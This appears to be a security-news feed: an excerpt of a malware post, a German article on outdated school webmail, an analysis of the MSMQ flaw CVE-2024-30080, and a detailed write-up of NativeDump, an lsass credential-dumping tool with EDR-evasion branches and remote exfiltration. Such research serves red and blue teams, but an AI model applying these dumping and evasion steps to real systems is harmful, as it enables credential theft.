I hope this post with practical example is useful for malware researchers, red teamers, spreads awareness to the blue teamers of this interesting technique.

Telegram Bot API
https://github.com/python-telegram-bot/python-telegram-bot
WebSec Malware Scanner
source code in github

This is a practical case for educational purposes only.

Thanks for your time happy hacking and good bye!
PS. All drawings and screenshots are mine

Die Sicherheit unserer Kinder

17 June 2024 at 08:30

Warum Münchner Schulen zur Angriffsfläche für Hacker werden 

Die IT-Sicherheit in zahlreichen Grund- und Hauptschulen in München ist unzureichend. Der Bayerische Lehrerverband drängt auf eine verbesserte Ausstattung, während die Stadt München an einer Umstellung arbeitet. 

Problem der veralteten Web-Mail-Anwendung 
 
Die Web-Mail-Anwendung Horde, die von vielen Grund- und Hauptschulen in München genutzt wird, hat seit Juni 2020 keine Aktualisierungen mehr erhalten. Die Tatsache, dass in dreieinhalb Jahren keine Updates durchgeführt wurden, birgt laut dem IT-Sicherheitsexperten Florian Hansemann von HanseSecure erhebliche Gefahren: „Es handelt sich um eine extrem veraltete Software, bei der die Wahrscheinlichkeit von Sicherheitslücken sehr hoch ist, Hacker könnten ein leichtes Spiel haben!“ Hansemann betont weiter, dass die Software grundsätzlich nicht mehr aktualisiert wird und ihr sogenanntes ‚Ende of Life‘ erreicht hat. 

Wie gelangen die Daten unserer Kinder eventuell ins Darknet? 

Im E-Mail-Austausch zwischen Grund- und Hauptschulen werden sensible Daten von Kindern und Jugendlichen verarbeitet. 
Florian Hansemann sagt: „Wenn Hacker jetzt diese Daten erbeuten, könnten sie beispielsweise Identitätsdiebstahl betreiben, sich als Kind ausgeben, persönliche Daten übernehmen und Adressen herausfinden, was zu Stalking führen könnte.“  

Solche Themen seien von großer Bedeutung. Es kommt immer wieder vor, dass Daten von Kindern und Jugendlichen auf einschlägigen Hackerseiten im Darknet auftauchen, erklären IT-Sicherheitsexperten. 

Auch das Bundesamt für Sicherheit in der Informationstechnik (BSI) warnt vor offenen Schwachstellen: „Schwachstellen in Büroanwendungen und anderen Programmen sind nach wie vor eine der Hauptangriffsflächen für Cyberangriffe.“ 

Stadt München als Sachaufwandsträger plant Verbesserungen 

Die Stadt München fungiert als Sachaufwandsträger für die IT-Sicherheit an bayerischen Schulen und plant Verbesserungen. Die Stadt gibt jedoch keinen genauen Zeitplan für den Abschluss dieser Verbesserungen an. 

Lehrkräfte als IT-Verantwortliche? 

Ein weiteres Problem ist, dass nicht immer ausgewiesene Experten für die IT-Sicherheit an Schulen verantwortlich sind. Laut den „Empfehlungen zur IT-Ausstattung von Schulen für die Jahre 2023 und 2024“ des Bayerischen Kultusministeriums dürfen Lehrkräfte in einem begrenzten Umfang technische IT-Administration durchführen. Hans Rottbauer vom Lehrer- und Lehrerinnenverband sieht dies kritisch und fordert eine angemessene personelle Ausstattung der Schulen mit Fachkräften für den IT-Bereich. 

Bayerischer Datenschutzbeauftragter prüft den Fall 

Der Münchner Rechtsanwalt Marc Maisch betrachtet die Verwendung des veralteten Web-Mailers als klaren Verstoß gegen die Datenschutzgrundverordnung, die den Einsatz zeitgemäßer Technologien vorschreibt. Maisch hat aufgrund von Recherchen des BR eine Beschwerde beim Datenschutzbeauftragten eingereicht, die derzeit bearbeitet wird.“ 

Fazit 

Kinderdaten müssen besser geschützt werden! 

Gundolf Kiefer, Sprecher des Bayerischen Elternverbands und Professor für Technische Informatik an der Hochschule Augsburg, kritisiert die Verwendung veralteter Web-Mailer an Schulen. Er betont die Bedeutung der Datensicherheit und den besonderen Schutz, den die Datenschutzgrundverordnung (DSGVO) für die Daten von Minderjährigen vorsieht. Kiefer unterstreicht die Notwendigkeit einer ernsthaften Berücksichtigung der Folgekosten und Sicherheitsaspekte bei der IT-Ausstattung von Schulen sowie die Bedeutung von qualifiziertem IT-Personal. 

https://unsplash.com/de/@profwicks 

Der Beitrag Die Sicherheit unserer Kinder erschien zuerst auf HanseSecure GmbH.

Simple analyze about CVE-2024-30080

17 June 2024 at 09:39

Author: k0shl of Cyber Kunlun

In the June Patch Tuesday, MSRC patched the pre-auth RCE I reported, assigned to CVE-2024-30080. This is a race condition that leads to a use-after-free remote code execution in the MSMQ HTTP component.

At POC2023 last year, Yuki Chen(@guhe120), Azure Yang(@4zure9), and I gave a presentation to introduce all MSMQ attack surfaces. After returning to work, I simply went through all of them again, and when I reviewed the MSMQ HTTP component, I found an overlooked pattern, which led to CVE-2024-30080.

The vulnerability exists in mqise.dll, in a function named RPCToServer.

CLIENT_CALL_RETURN __fastcall RPCToServer(__int64 a1, __int64 a2, __int64 a3, __int64 a4)
{
[...]
      LocalRPCConnection2QM = GetLocalRPCConnection2QM(&AddressString, v8, v9);
      if ( LocalRPCConnection2QM )
      {
        v15 = v5;
        return NdrClientCall3((MIDL_STUBLESS_PROXY_INFO *)&pProxyInfo, 0, 0i64, LocalRPCConnection2QM, a2, v15, a4);
      }
      RemoveRPCCacheEntry(&AddressString, v14);
[...]
}

At POC2023, we also introduced the MSMQ HTTP component. It receives HTTP POST data and then passes it into the RPCToServer function. The MSMQ HTTP component acts more like an RPC client; it serializes POST data as parameters of NdrClientCall3 and sends it to the MSMQ RPC server.

When I reviewed this code, I noticed these two functions: GetLocalRPCConnection2QM and RemoveRPCCacheEntry.

In the GetLocalRPCConnection2QM function, the service retrieves the RPC binding handle from a global variable. If the global variable is empty, it first binds the handle to the RPC server and then returns to the outer function.

In the RemoveRPCCacheEntry function, it removes the RPC binding handle from the global variable and then invokes RpcBindingFree to release the RPC binding handle.

The question I had when reviewing this code was: if the variable LocalRPCConnection2QM is NULL, service invokes RemoveRPCCacheEntry instead of NdrClientCall3, does RemoveRPCCacheEntry really work if the RPC binding handle is already NULL in this situation?

I quickly realized there was an overlooked pattern in this code.

Do you remember the RPC client mechanism? A typical RPC client defines an IDL file to specify the type of parameter for the RPC interface. When invoking NdrClientCall3, the parameters are marshalled according to the IDL. If the parameter is invalid, it will crash the RPC client when it is serialized in rpcrt4.dll. This is why we sometimes encounter client crashes when hunting bugs in the RPC server.

To prevent client crashes, we usually add RPC exceptions in the code as follows:

    RpcTryExcept
    {
        [...]
    }
    RpcExcept(1)
    {
        ULONG ulCode = RpcExceptionCode();
        printf("Run time reported exception 0x%lx = %ld\n",
            ulCode, ulCode);
        return false;
    }
    RpcEndExcept
        return true;

It's clear now that the overlooked pattern is that the NdrClientCall3 function is within an RPC exception, but the IDA pseudocode doesn't show it. This means if an unauthenticated user passes an invalid parameter into NdrClientCall3, it triggers a crash during marshalling in rpcrt4.dll, which then invokes the RemoveRPCCacheEntry function to release the RPC binding handle as it will be invoked in RpcExcept.

There is a time window where if one thread passes an invalid parameter and then releases the RPC binding handle, while another thread retrieves the RPC binding handle from the global variable and passes it into NdrClientCall3, it will use the freed RPC handle inside rpcrt4.dll.

Crash Dump:

0:021> r
rax=000001bcbf5c6df0 rbx=00000033d80fed10 rcx=0000000000000000
rdx=0000000000001e50 rsi=000001bcbaf22f10 rdi=00007ffe04f1a020
rip=00007ffe2dc0616f rsp=00000033d80fe910 rbp=00000033d80fea10
 r8=00007ffe04f1a020  r9=00000033d80fee40 r10=000001bcbf5c6df0
r11=00007ffe04f1a9bc r12=0000000000000000 r13=00000033d80feb60
r14=00000033d80ff178 r15=00007ffe04f1a2c0
iopl=0         nv up ei pl nz na po nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010204
RPCRT4!I_RpcNegotiateTransferSyntax+0x5f:
00007ffe`2dc0616f 817808efcdab89  cmp     dword ptr [rax+8],89ABCDEFh ds:000001bc`bf5c6df8=????????

Stack Trace:

0:021> k
 # Child-SP          RetAddr               Call Site
00 00000033`d80fe910 00007ffe`2dc9b9d3     RPCRT4!I_RpcNegotiateTransferSyntax+0x5f
01 00000033`d80fea50 00007ffe`2dc9b14d     RPCRT4!NdrpClientCall3+0x823
02 00000033`d80fedc0 00007ffe`04f141e8     RPCRT4!NdrClientCall3+0xed
03 00000033`d80ff160 00007ffe`04f13fef     MQISE!RPCToServer+0x150
04 00000033`d80ff310 00007ffe`04f138c2     MQISE!HandleEndOfRead+0xa3
05 00000033`d80ff350 00007ffe`04f53d40     MQISE!GetHttpBody+0x112
Before yesterdayMain stream

NativeDump - Dump Lsass Using Only Native APIs By Hand-Crafting Minidump Files (Without MinidumpWriteDump!)

By: Zion3R
16 June 2024 at 17:16


NativeDump allows to dump the lsass process using only NTAPIs generating a Minidump file with only the streams needed to be parsed by tools like Mimikatz or Pypykatz (SystemInfo, ModuleList and Memory64List Streams).


  • NTOpenProcessToken and NtAdjustPrivilegeToken to get the "SeDebugPrivilege" privilege
  • RtlGetVersion to get the Operating System version details (Major version, minor version and build number). This is necessary for the SystemInfo Stream
  • NtQueryInformationProcess and NtReadVirtualMemory to get the lsasrv.dll address. This is the only module necessary for the ModuleList Stream
  • NtOpenProcess to get a handle for the lsass process
  • NtQueryVirtualMemory and NtReadVirtualMemory to loop through the memory regions and dump all possible ones. At the same time it populates the Memory64List Stream

Usage:

NativeDump.exe [DUMP_FILE]

The default file name is "proc_.dmp":

The tool has been tested against Windows 10 and 11 devices with the most common security solutions (Microsoft Defender for Endpoints, Crowdstrike...) and is for now undetected. However, it does not work if PPL is enabled in the system.

Some benefits of this technique are: - It does not use the well-known dbghelp!MinidumpWriteDump function - It only uses functions from Ntdll.dll, so it is possible to bypass API hooking by remapping the library - The Minidump file does not have to be written to disk, you can transfer its bytes (encoded or encrypted) to a remote machine

The project has three branches at the moment (apart from the main branch with the basic technique):

  • ntdlloverwrite - Overwrite ntdll.dll's ".text" section using a clean version from the DLL file already on disk

  • delegates - Overwrite ntdll.dll + Dynamic function resolution + String encryption with AES + XOR-encoding

  • remote - Overwrite ntdll.dll + Dynamic function resolution + String encryption with AES + Send file to remote machine + XOR-encoding


Technique in detail: Creating a minimal Minidump file

After reading Minidump undocumented structures, its structure can be summed up to:

  • Header: Information like the Signature ("MDMP"), the location of the Stream Directory and the number of streams
  • Stream Directory: One entry for each stream, containing the type, total size and location in the file of each one
  • Streams: Every stream contains different information related to the process and has its own format
  • Regions: The actual bytes from the process from each memory region which can be read

I created a parsing tool which can be helpful: MinidumpParser.

We will focus on creating a valid file with only the necessary values for the header, stream directory and the only 3 streams needed for a Minidump file to be parsed by Mimikatz/Pypykatz: SystemInfo, ModuleList and Memory64List Streams.


A. Header

The header is a 32-bytes structure which can be defined in C# as:

public struct MinidumpHeader
{
public uint Signature;
public ushort Version;
public ushort ImplementationVersion;
public ushort NumberOfStreams;
public uint StreamDirectoryRva;
public uint CheckSum;
public IntPtr TimeDateStamp;
}

The required values are: - Signature: Fixed value 0x504d44d ("MDMP" string) - Version: Fixed value 0xa793 (Microsoft constant MINIDUMP_VERSION) - NumberOfStreams: Fixed value 3, the three Streams required for the file - StreamDirectoryRVA: Fixed value 0x20 or 32 bytes, the size of the header


B. Stream Directory

Each entry in the Stream Directory is a 12-bytes structure so having 3 entries the size is 36 bytes. The C# struct definition for an entry is:

public struct MinidumpStreamDirectoryEntry
{
public uint StreamType;
public uint Size;
public uint Location;
}

The field "StreamType" represents the type of stream as an integer or ID, some of the most relevant are:

ID Stream Type
0x00 UnusedStream
0x01 ReservedStream0
0x02 ReservedStream1
0x03 ThreadListStream
0x04 ModuleListStream
0x05 MemoryListStream
0x06 ExceptionStream
0x07 SystemInfoStream
0x08 ThreadExListStream
0x09 Memory64ListStream
0x0A CommentStreamA
0x0B CommentStreamW
0x0C HandleDataStream
0x0D FunctionTableStream
0x0E UnloadedModuleListStream
0x0F MiscInfoStream
0x10 MemoryInfoListStream
0x11 ThreadInfoListStream
0x12 HandleOperationListStream
0x13 TokenStream
0x16 HandleOperationListStream

C. SystemInformation Stream

First stream is a SystemInformation Stream, with ID 7. The size is 56 bytes and will be located at offset 68 (0x44), after the Stream Directory. Its C# definition is:

public struct SystemInformationStream
{
public ushort ProcessorArchitecture;
public ushort ProcessorLevel;
public ushort ProcessorRevision;
public byte NumberOfProcessors;
public byte ProductType;
public uint MajorVersion;
public uint MinorVersion;
public uint BuildNumber;
public uint PlatformId;
public uint UnknownField1;
public uint UnknownField2;
public IntPtr ProcessorFeatures;
public IntPtr ProcessorFeatures2;
public uint UnknownField3;
public ushort UnknownField14;
public byte UnknownField15;
}

The required values are: - ProcessorArchitecture: 9 for 64-bit and 0 for 32-bit Windows systems - Major version, Minor version and the BuildNumber: Hardcoded or obtained through kernel32!GetVersionEx or ntdll!RtlGetVersion (we will use the latter)


D. ModuleList Stream

Second stream is a ModuleList stream, with ID 4. It is located at offset 124 (0x7C) after the SystemInformation stream and it will also have a fixed size, of 112 bytes, since it will have the entry of a single module, the only one needed for the parse to be correct: "lsasrv.dll".

The typical structure for this stream is a 4-byte value containing the number of entries followed by 108-byte entries for each module:

public struct ModuleListStream
{
public uint NumberOfModules;
public ModuleInfo[] Modules;
}

As there is only one, it gets simplified to:

public struct ModuleListStream
{
public uint NumberOfModules;
public IntPtr BaseAddress;
public uint Size;
public uint UnknownField1;
public uint Timestamp;
public uint PointerName;
public IntPtr UnknownField2;
public IntPtr UnknownField3;
public IntPtr UnknownField4;
public IntPtr UnknownField5;
public IntPtr UnknownField6;
public IntPtr UnknownField7;
public IntPtr UnknownField8;
public IntPtr UnknownField9;
public IntPtr UnknownField10;
public IntPtr UnknownField11;
}

The required values are: - NumberOfStreams: Fixed value 1 - BaseAddress: Using psapi!GetModuleBaseName or a combination of ntdll!NtQueryInformationProcess and ntdll!NtReadVirtualMemory (we will use the latter) - Size: Obtained adding all memory region sizes since BaseAddress until one with a size of 4096 bytes (0x1000), the .text section of other library - PointerToName: Unicode string structure for the "C:\Windows\System32\lsasrv.dll" string, located after the stream itself at offset 236 (0xEC)


E. Memory64List Stream

Third stream is a Memory64List stream, with ID 9. It is located at offset 298 (0x12A), after the ModuleList stream and the Unicode string, and its size depends on the number of modules.

public struct Memory64ListStream
{
public ulong NumberOfEntries;
public uint MemoryRegionsBaseAddress;
public Memory64Info[] MemoryInfoEntries;
}

Each module entry is a 16-bytes structure:

public struct Memory64Info
{
public IntPtr Address;
public IntPtr Size;
}

The required values are: - NumberOfEntries: Number of memory regions, obtained after looping memory regions - MemoryRegionsBaseAddress: Location of the start of memory regions bytes, calculated after adding the size of all 16-bytes memory entries - Address and Size: Obtained for each valid region while looping them


F. Looping memory regions

There are pre-requisites to loop the memory regions of the lsass.exe process which can be solved using only NTAPIs:

  1. Obtain the "SeDebugPrivilege" permission. Instead of the typical Advapi!OpenProcessToken, Advapi!LookupPrivilegeValue and Advapi!AdjustTokenPrivilege, we will use ntdll!NtOpenProcessToken, ntdll!NtAdjustPrivilegesToken and the hardcoded value of 20 for the Luid (which is constant in all latest Windows versions)
  2. Obtain the process ID. For example, loop all processes using ntdll!NtGetNextProcess, obtain the PEB address with ntdll!NtQueryInformationProcess and use ntdll!NtReadVirtualMemory to read the ImagePathName field inside ProcessParameters. To avoid overcomplicating the PoC, we will use .NET's Process.GetProcessesByName()
  3. Open a process handle. Use ntdll!OpenProcess with permissions PROCESS_QUERY_INFORMATION (0x0400) to retrieve process information and PROCESS_VM_READ (0x0010) to read the memory bytes

With this it is possible to traverse process memory by calling: - ntdll!NtQueryVirtualMemory: Return a MEMORY_BASIC_INFORMATION structure with the protection type, state, base address and size of each memory region - If the memory protection is not PAGE_NOACCESS (0x01) and the memory state is MEM_COMMIT (0x1000), meaning it is accessible and committed, the base address and size populates one entry of the Memory64List stream and bytes can be added to the file - If the base address equals lsasrv.dll base address, it is used to calculate the size of lsasrv.dll in memory - ntdll!NtReadVirtualMemory: Add bytes of that region to the Minidump file after the Memory64List Stream


G. Creating Minidump file

After previous steps we have all that is necessary to create the Minidump file. We can create a file locally or send the bytes to a remote machine, with the possibility of encoding or encrypting the bytes before. Some of these possibilities are coded in the delegates branch, where the file created locally can be encoded with XOR, and in the remote branch, where the file can be encoded with XOR before being sent to a remote machine.




❌
❌